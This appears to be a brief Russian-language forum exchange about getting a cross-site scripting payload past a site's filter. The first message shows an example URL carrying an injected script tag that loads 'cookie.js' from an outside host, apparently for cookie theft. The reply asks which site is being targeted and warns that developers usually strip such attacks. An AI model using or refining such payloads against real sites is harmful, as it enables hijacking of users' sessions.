К примеру адрес сайта http://test.ru/search="><script src=http://mysite.com/cookie.js></script> и их сайт удаляет script
больше инфы дай, куда встраиваешь xss, на каком сайте? плюс не думай, что разработчики не позаботились о вырезке таких атак